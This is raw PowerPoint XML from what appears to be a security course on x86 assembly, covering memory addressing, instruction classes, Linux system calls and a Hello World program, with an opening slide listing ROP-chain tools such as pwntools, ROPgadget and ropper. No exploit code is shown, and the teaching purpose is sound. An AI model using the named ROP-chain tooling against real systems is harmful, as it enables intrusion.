            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ropper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated tools to build ROP chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a comprehensive library used by most of the top CTF teams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>232</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1212058953"/>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 Security Research</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FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>233</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14373197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0690" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>), %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 8 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>), %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>moves the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the memory at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x804a0e4, %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the value 0x804a0e4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (0x804a0e4), %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the content of memory at address 0x804a0e4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142937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06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06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106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106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106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1069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1069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1069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1069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1069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42" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, push, pop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary arithmetic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add, sub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>imul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>idiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, div, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>and, or, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="435670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4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42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424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42" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, call, ret, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>iret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Values can be compared using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> # subtracts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without saving the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bits are set accordingly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (ZF=0), je (ZF=1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (CF=0), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (SF=OF), …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer can be direct (destination is a constant) or indirect (the destination address is the content of a register)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input/output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in, out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Misc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="832011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4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42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424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24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24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424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424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424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34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Invoking System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System calls are usually invoked through libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux/x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains the system call number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1616206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Hello World!</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a:t>.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	.string "Hello World\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	$4,%eax	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$1,%ebx	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
